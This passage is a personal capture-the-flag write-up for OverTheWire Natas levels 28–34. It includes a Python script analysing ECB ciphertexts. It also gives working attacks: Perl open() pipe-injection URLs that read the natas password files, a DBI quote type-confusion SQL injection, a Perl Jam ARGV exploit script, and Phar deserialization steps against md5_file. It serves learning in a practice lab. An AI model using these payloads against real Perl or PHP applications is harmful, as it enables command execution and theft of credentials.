QQ =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKjjlqA/WQJykmE1+kpW/IWSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
RR =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIHX7YfF2rSlPXcbhDVw8IOSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
SS =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKzNLhMs+WHZ7pV747HBaHgSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
TT =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKv0jAApMI4dXk/YCiuHKvHSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
UU =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJssZAs11DbnBVbH8vMCB78SHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
VV =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJkHXNSbRs7XtXQ9gqZl/h0SHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
WW =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLRcT+XTnwYNfizOG+A2eLBSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
XX =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIYeNqp0ZNyBFzSh8IVJyimSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
YY =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKyT4qzIZtID8NFJn5z+4oPSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
ZZ =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIW1pqZkKlQVVy9ETs2A8TvSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
- I really couldn't figure out this level, but there are a number of writeups available on the internet.
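What the tables above are showing, in code, as an added example that is not part of the original writeup: under ECB every 16-byte plaintext block is encrypted independently, so a ciphertext built as prefix + query + suffix leaks the block size, how many leading blocks are pure prefix, and where the query starts, simply by growing the query one byte at a time. The block below takes the rows for lengths 0 to 13 from the first table (the query was "a" repeated n times: the "a" and "aa" rows of the later tables equal the length 1 and length 2 rows) and derives those numbers. It assumes PKCS#7 padding when estimating the prefix+suffix total; that is an assumption, not something the writeup states. This is the check a reviewer runs to confirm a scheme is ECB; the fix is an authenticated mode such as AES-GCM with a fresh nonce per message, under which none of these regularities appear.

```python
import base64

# Ciphertexts copied from the fuzzing table above (query = "a" * n). The
# leading "=" printed in the table is the URL parameter separator, not base64.
SAMPLES = {
    0: "G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLof/YMma1yzL2UfjQXqQEop36O0aq+C10FxP/mrBQjq0eOsaH+JhosbBUGEQmz/to=",
    1: "G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKriAqPE2++uYlniRMkobB1vfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=",
    2: "G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKxMKUxvsiccFITv6XJZnrHSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=",
    3: "G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIvUpOmOsuf6Me06CS3bWodmi4rXbbzHxmhT3Vnjq2qkEJJuT5N6gkJR5mVucRLNRo=",
    4: "G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPI1BKmpZ1/9YUtPH5DShPyqKSh/PMVHnhLmbzHIY7GAR1bVcy3Ix3D2Q5cVi8F6bmY=",
    5: "G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLDah8EaRWKMFIWYUal4/LsrDuHHBxEg4a0XNNtno9y9GVRSbu6ISPYnZVBfqJ/Ons=",
    6: "G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJKEf/nOv0V2qBes8NIbc3hQcCYxLrNxe2TV1ZOUQXdfmTQ3MhoJTaSrfy9N5bRv4o=",
    7: "G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKf3hzvbj+EoXJjPzB0/I4YZIaVSupG+5Ppq4WEW09L0Nf/K3JUU/wpRwHlH118D44=",
    8: "G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJFPgAgYC9NzNUPDrdwlHfCiW3pCIT4YQixZ/i0rqXXY5FyMgUUg+aORY/QZhZ7MKM=",
    9: "G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKeYiaGpSZAWVcGCZq8sFK7oJUi8wHPnTascCPxZZSMWpc5zZBSL6eob5V3O1b5+MA=",
    10: "G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6Oec4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI=",
    11: "G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OetO2gh9PAvqK+3BthQLni68qM9OYQkTq645oGdhkgSlo=",
    12: "G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OezoKpVTtluBKA+2078pAPR3X9UET9Bj0m9rt/c0tByJk=",
    13: "G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OeH3RxTXb8xdRkxqIh5u2Y5GIjoU2cQpG5h3WwP7xz1O3YrlHX2nGysIPZGaDXuIuY",
}


def blocks(ct, bs):
    """Split a ciphertext into fixed-size blocks."""
    return [ct[i:i + bs] for i in range(0, len(ct), bs)]


def decode_samples(samples=SAMPLES):
    return {n: base64.b64decode(s) for n, s in samples.items()}


def infer_block_size(cts):
    """The ciphertext grows in steps of one block as the input grows, so the
    size of the length jump is the cipher's block size."""
    lens = [len(cts[n]) for n in sorted(cts)]
    steps = {b - a for a, b in zip(lens, lens[1:]) if b != a}
    if len(steps) != 1:
        raise ValueError("expected exactly one step size, got %r" % steps)
    return steps.pop()


def constant_leading_blocks(cts, bs):
    """Number of leading blocks identical in every sample. Under ECB those
    blocks consist only of the fixed prefix (a lower bound on its length)."""
    count = 0
    for column in zip(*(blocks(ct, bs) for ct in cts.values())):
        if len(set(column)) != 1:
            break
        count += 1
    return count


def infer_prefix_length(cts, bs):
    """The first block that varies with the input keeps changing until the
    input fills it; after that, extra input only changes later blocks. The
    smallest n at which that block is equal for n and n+1 gives
    prefix_len = (idx + 1) * bs - n."""
    idx = constant_leading_blocks(cts, bs)
    for n in sorted(cts):
        if n + 1 not in cts:
            break
        if blocks(cts[n], bs)[idx] == blocks(cts[n + 1], bs)[idx]:
            return (idx + 1) * bs - n
    raise ValueError("the input never filled a whole block; collect longer samples")


def infer_fixed_length(cts):
    """Prefix+suffix total, assuming PKCS#7 padding (an extra full block is
    appended as soon as the plaintext is block-aligned). With zero padding
    the jump would come one byte later, so the true value could be one larger."""
    base = len(cts[0])
    for n in sorted(cts):
        if len(cts[n]) > base:
            return base - n
    raise ValueError("no length jump observed")


def analyse(samples=SAMPLES):
    cts = decode_samples(samples)
    bs = infer_block_size(cts)
    prefix = infer_prefix_length(cts, bs)
    fixed = infer_fixed_length(cts)
    return {
        "block_size": bs,
        "constant_blocks": constant_leading_blocks(cts, bs),
        "prefix_len": prefix,
        "suffix_len": fixed - prefix,
    }


if __name__ == "__main__":
    for key, value in analyse().items():
        print(key, value)
```

The functions work on any set of ciphertexts indexed by input length, not just these rows; on this data they report a 16-byte block size, two blocks of pure prefix, a 38-byte prefix and (under the PKCS#7 assumption) a 29-byte suffix, which is why the third block stops changing once the query reaches 10 characters in the table above.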
29 ➜ 30
- Something is perl-ish about this level
- Changing `file` in the URL to the password didn't get me anywhere
- The URL with one of the options selected looks like http://natas29.natas.labs.overthewire.org/index.pl?file=perl+underground+2
- Fuzzing the URL using CGIs gave a bunch of false positives
- Most likely using Perl's `open` to open a file; `open` can be used to execute commands using "|". Try http://natas29.natas.labs.overthewire.org/index.pl?file=|echo%20%22hello%22
- Trying various inputs, just a space at the end helped open the file index.pl, so I can see the code now
- http://natas29.natas.labs.overthewire.org/index.pl?file=|cat%20index.pl%20
- As can be seen in the code, the input file name is suffixed with .txt; adding a space meant cat got two files as input, which works out for us
- Can be tried on the command line:
```
$ perl -e 'print open my $s, "|cat test.pl .txt"; print $s;'
test
cat: .txt: No such file or directory
12970GLOB(0x55c4c5d494d8)%
```
- The code shows that an input file name containing `natas` is caught by the if condition
- Luckily cat supports inputs with wildcards
- http://natas29.natas.labs.overthewire.org/index.pl?file=|cat%20/etc/nata*_webpass/nata*30%20%20
30 ➜ 31
- Looking at the source code, it looked like a simple SQLi with a password input like `1234' OR '1'='1` or `1234" OR "1"="1`
- `quote` will escape any special characters, so this won't work
- Unsanitized input to `quote` => passing a list sets the data type of the input, and based on the type, quotes would not be added for, say, numeric types
- Used python for the request; used SQL_INTEGER and SQL_NUMERIC first, didn't work
- Found data type codes used by DBI
31 ➜ 32
- This one was interesting to research
- The attack is exactly the one described in The Perl Jam
```python
def threeonetothreetwo():
    import requests
    headers = {
        'Authorization': '<header>'  # Basic auth header for natas31
    }
    # The query string ends up in Perl's @ARGV; the second "file" value, ARGV,
    # makes the script read through the magic ARGV handle, so "ls . |" is
    # opened as a pipe (the trick from The Perl Jam)
    r = requests.post('http://natas31.natas.labs.overthewire.org/index.pl?ls . |',
                      headers=headers, files={'file': 'file.test'}, data={'file': 'ARGV'})
    print(r.text)
```
32 ➜ 33
- Use the same exploit as before: `ls` and then run whatever you find
33 ➜ 34
- This was a very interesting and instructive level as well
- Observe the code carefully and look up exploits for the functions that are being used
- Turns out `md5_file` is exploitable using https://blog.ripstech.com/2018/new-php-exploitation-technique/
- The key point to remember is that creating a Phar with the right code as `metadata` will cause the code to execute upon opening it and give the password.
- Create a pass.php with code that reads the password file and upload it by forcing the uploaded name to `pass.php` by mutating the upload form
- This will be used by the Executor object so that its contents are executed when __destruct() runs. Calculate the md5 for pass.php so that the `if` check passes
- Package the Executor object as a Phar, specifying a dummy stream like `test.txt`
- Upload the phar while enforcing the filename
- Now upload a file with the name `phar://<phar-filename>/<stream>` with the binary of the phar file
- The password would now be visible
And that's all! I learned a bunch of things while doing this. No doubt I got stuck a few times and had to take a little help from here and there, but I got to know about a bunch of new things...